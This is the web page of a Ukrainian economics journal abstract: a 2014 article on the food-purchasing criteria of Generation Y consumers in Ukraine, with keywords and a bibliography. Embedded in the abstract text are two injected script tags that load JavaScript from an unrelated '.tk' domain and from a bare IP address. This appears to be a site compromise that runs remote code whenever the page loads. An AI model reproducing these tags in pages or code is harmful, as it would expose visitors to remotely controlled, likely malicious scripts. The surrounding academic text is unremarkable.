ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.338
Аграрний ринок

Критерії купівельної поведінки споживачів на ринку продуктів харчування в Україні / Козак Л. В. // Економіка АПК. - 2014. - № 5 - С. 30

Висвітлено особливості купівельної поведінки на ринку продуктів харчування представників покоління Y в Україні, народжених у 1991–1994 роках. На основі вибіркового маркетингового опитування 1270 осіб віком від 19 до 22 років з десяти областей України (з них 540 чоловіків і 730 жінок) було виявлено погляди наймолодшого покоління в Україні щодо їх сприйняття продуктів харчування як потреби; досліджено функціональні й уявні атрибути продуктів харчування, а також морально-етичні цінності та критерії їх закупівлі, які є значимими для цієї вікової групи; визначено критерії купівельної поведінки споживачів на даному ринку. Результатом проведеного дослідження є зроблені автором висновки щодо типу та особливостей купівельної поведінки досліджуваної групи представників покоління Y в Україні на ринку продуктів харчування, які можуть бути використані у формуванні стратегій позиціювання вітчизняних аграрних і переробних підприємств. Наукова новизна дослідження полягає у комплексному та системному аналізі сукупного впливу на купівельну поведінку споживачів реальних та асоціативних атрибутів продуктів харчування. Практична цінність запропонованої методики дослідження полягає в тому, що її можна застосовувати для виявлення особливостей купівельної поведінки на ринку продуктів харчування решти вікових груп, а також на інших ринках. Рис.: 5. Бібліогр.: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: покоління Y в Україні, купівельна поведінка споживача, реальні та асоціативні атрибути товару, ринок продуктів харчування, маркетингове дослідження

Список використаних джерел

 1. Blackwell R. Consumer Behaviour/ Blackwell R., Miniard P., Engel, J.  [translated from English by Kolotvyna E., Kruglova-Morozova L]. - [10 ed.]. - St. Petersburg. : Piter, 2007. 944 p.
 2. Yerankin O.O. Marketing in Agriculture Industry in Ukraine in the context of globalization: a monograph / O. Yerankin. - K.: MBK, 2009. - 419, [5] p.
 3. Kotler F., Keller K.L. Marketing Management. [Ibid] Express course. 3rd ed. / translated from English under Zhiltsov, S. - St. Petersburg: Piter, 2010. - 480 p.: Il .. - (Series "Klassicheskiy zarubezhniy uchebnik")
 4. Marketing / Starostina A.O., Goncharova N.P., Krykavskyy E.V. et al.- K: Knowledge, 2009. - 1070 p.
 5. Panyotto V.I., Maksymenko V.S. Quantitative methods in sociological research. - Kiev: Naukova. dumka, 1982. - 272 p.
 6. Trank P. What can be expected from members of Generation Z when they become workers? / [Electronic resource]. –Retrieved from: http://blog.management.com.ua/item/1337
 7. Ulvyk E. What consumers wan / E. Ulvyk, [translated from English by Popkov S.]. K.: Sompanion Ghour, 2007. - 224 p.
 8. Shmyhyn I. Philosophy of consumption / Isabel Shmyhyn; [translated from English by Svinchenko S.]. - H.: Humanytarny Center , 2009. - 304 p.
 9. Koester U. Grundzüge der landwirtschaftlichen Marktlehre. – 4 Auflage. – München: Vahlen, 2011. – 413 S.
 10. Kotler, Philip and Gary Armstrong. Principles of Marketing. 12th edition. Hemel Hempstead: Prеntice Hаll Intеrnational, 2007.
 11. Mankiw, Gregory N. Principles of Microeconomics. 6th edition. Mason, OH: South-Western Cengage Learning, 2012.
 12. Jean-Jacques Lambin. Strategic Marketing: A European Approach. London; New York: McGraw-Hill, 1993.
 13. Ries, Al and Trout, Jack. Marketing Warfare. 20th Anniversary Edition. New York: McGraw-Hill, 2006.
 14. Samuelson, Paul A. and William D. Nordhaus. Microeconomics. 19th edition. New York, NY: McGraw-Hill Irwin, 2010.
Читати статтю: 14_05_30-36.pdf